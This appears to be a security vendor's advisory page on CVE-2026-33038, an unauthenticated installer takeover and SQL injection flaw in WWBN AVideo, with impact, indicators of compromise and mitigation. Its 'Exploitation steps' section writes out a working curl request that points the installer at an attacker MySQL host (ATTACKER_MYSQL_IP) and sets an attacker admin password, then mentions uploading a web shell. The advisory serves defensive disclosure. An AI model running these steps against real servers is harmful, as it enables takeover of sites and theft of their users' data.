CVE-2026-33038: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33038 is an unauthenticated application takeover vulnerability in WWBN AVideo affecting all versions prior to 26.0 (patched versions >= 24.0 per the security advisory). The vulnerability exists in the install/checkConfiguration.php endpoint, which performs full application initialization — including database setup, admin account creation, and configuration file writing — without any authentication, CSRF protection, or access restriction. It was discovered and reported by bugbunny.ai, published on March 16, 2026, and added to the NVD on March 20, 2026. It carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause is CWE-306 (Missing Authentication for Critical Function), with a secondary weakness of CWE-89 (SQL Injection). The install/checkConfiguration.php endpoint's sole guard is a file-existence check for videos/configuration.php; if that file is absent (fresh deployment, container restart without persistent storage, or re-deployment), the entire installer executes with attacker-supplied POST parameters. Critically, the endpoint accepts an attacker-controlled databaseHost parameter, allowing the attacker to point the application at their own MySQL server — eliminating the need to guess legitimate database credentials. Additionally, $_POST['contactEmail'] is directly concatenated into an SQL INSERT statement on line 120 without sanitization, enabling SQL injection. The fix (commit b3fa786) added session-based CSRF token validation, prepared statements for SQL queries, and a new install/.htaccess to disable directory listing (GitHub Advisory, Patch Commit).

Impact

Successful exploitation results in full application takeover: the attacker becomes the sole administrator with complete control over the AVideo instance. A persistent backdoor is established by writing attacker-controlled database credentials to videos/configuration.php, ensuring continued access even after the initial attack. If the attacker redirects the application to their own database, all future user data — including registrations, uploads, and comments — is exfiltrated to the attacker. Admin access further enables file uploads and plugin management, creating a pathway to arbitrary PHP code execution on the server (GitHub Advisory, AVideo Security Advisory).

Exploitability

A detailed, fully actionable proof-of-concept exploit is publicly available in the GitHub Security Advisory, including specific curl commands with attacker-controlled POST parameters targeting /install/checkConfiguration.php. Exploitation requires the application to be in an uninitialized state (no videos/configuration.php present), which is the primary complexity factor. There is no confirmed evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.085% (0.0011 per Feedly data), and the vulnerability is not currently listed in the CISA KEV catalog (AVideo Security Advisory, GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances using tools like Shodan or Censys. Confirm the target is uninitialized by checking whether /install/checkConfiguration.php is accessible and videos/configuration.php does not exist (e.g., by probing the endpoint for a non-exit response).
  2. Set up attacker-controlled MySQL server: On an attacker-controlled server, create a MySQL database pre-loaded with the AVideo schema:
mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql  # Use AVideo's own schema file
  1. Send malicious installation POST request: Submit attacker-controlled parameters to the unprotected installer endpoint:
curl -s -X POST https://TARGET/install/checkConfiguration.php \
  -d 'systemRootPath=/var/www/html/AVideo/' \
  -d 'databaseHost=ATTACKER_MYSQL_IP' \
  -d 'databasePort=3306' \
  -d 'databaseUser=attacker' \
  -d 'databasePass=attacker_pass' \
  -d 'databaseName=avideo' \
  -d 'createTables=1' \
  -d 'contactEmail=attacker@example.com' \
  -d 'systemAdminPass=AttackerPass123!' \
  -d 'webSiteTitle=Pwned' \
  -d 'mainLanguage=en_US' \
  -d 'webSiteRootURL=https://TARGET/'
  1. Persistent configuration written: The script connects to the attacker's database, creates the schema, inserts an admin user with the attacker's password, and writes videos/configuration.php with attacker-controlled database credentials — permanently redirecting the application.
  2. Log in as admin: Access the target AVideo instance and authenticate with admin / AttackerPass123! to gain full administrative control.
  3. Escalate to RCE (optional): Use admin file upload or plugin management features to upload a PHP web shell, achieving arbitrary code execution on the server (AVideo Security Advisory).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to /install/checkConfiguration.php from external IP addresses; outbound MySQL connections from the AVideo server to unknown external IPs on port 3306.
  • File System: Presence or unexpected modification of videos/configuration.php with unfamiliar databaseHost values pointing to external IPs; new or modified files in the install/ directory; unexpected PHP web shells in the AVideo web root or upload directories.
  • Logs: Web server access logs showing POST requests to /install/checkConfiguration.php from non-localhost addresses; PHP error logs containing entries like "Can not create configuration again" (indicating repeated takeover attempts); database connection logs showing connections from the AVideo server to external MySQL hosts.
  • Process: Unusual child processes spawned by the PHP/web server process (e.g., bash, curl, wget) that may indicate post-exploitation RCE via uploaded web shells.
  • Database: Presence of an admin user account with an unexpected email address or password hash in the users table; unexpected database schema or tables consistent with AVideo being re-initialized (AVideo Security Advisory).

Mitigation and workarounds

Update AVideo to version 26.0 or later (patched versions >= 24.0 per the security advisory), which includes CSRF token validation on the installer endpoint, prepared statements to prevent SQL injection, and a new install/.htaccess file. As an immediate workaround, restrict web access to the install/ directory via web server configuration (e.g., add Require local to install/.htaccess) or block access at the network/firewall level. Additionally, verify that videos/configuration.php exists and contains legitimate database credentials, and audit the users table for unauthorized admin accounts. Monitor configuration.php for unexpected modifications and review database access logs for connections to external hosts (GitHub Advisory, Patch Commit).

Community reactions

The vulnerability was discovered and responsibly disclosed by bugbunny.ai, with the advisory published by the AVideo maintainer (DanielnetoDotCom) on March 16, 2026. The fix was committed promptly (commit b3fa786), implementing CSRF protection and prepared statements. Coverage has appeared on aggregator sites including VulDB, CVEFeed, and exploit-intel.com, as well as community blogs, indicating moderate security community interest. No major vendor statements beyond the official advisory or notable threat actor commentary have been identified at this time (GitHub Advisory, AVideo Security Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management